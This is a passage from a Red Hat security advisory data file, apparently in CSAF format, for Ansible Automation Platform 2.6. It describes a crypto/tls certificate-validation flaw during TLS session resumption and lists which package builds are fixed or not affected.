"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260325-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260325-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels+daphne-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-channels-0:4.3.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260325-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-filter-0:25.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-drf-spectacular-0:0.29.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.7-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.1.1-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-ansible-1:0.25.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulp-container-0:2.19.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.54-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.14-1.el9.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.14-1.el9.x86_64"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-core-2:2.16.17-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-asgiref-0:3.11.1-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-django-0:5.2.12-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-asgiref-0:3.11.1-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:python3-django-0:5.2.12-2.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.4-2.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.4-2.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-server-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-ui-0:4.7.10-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-venv-tower-0:4.7.10-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-asgiref-0:3.11.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-django-0:5.2.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:ansible-test-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debuginfo-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-debugsource-0:1.6.4-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.6.3-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-automation-platform-installer-0:2.6-6.1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-core-1:2.16.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:ansible-rulebook-0:1.2.2-1.el9ap.noarch",
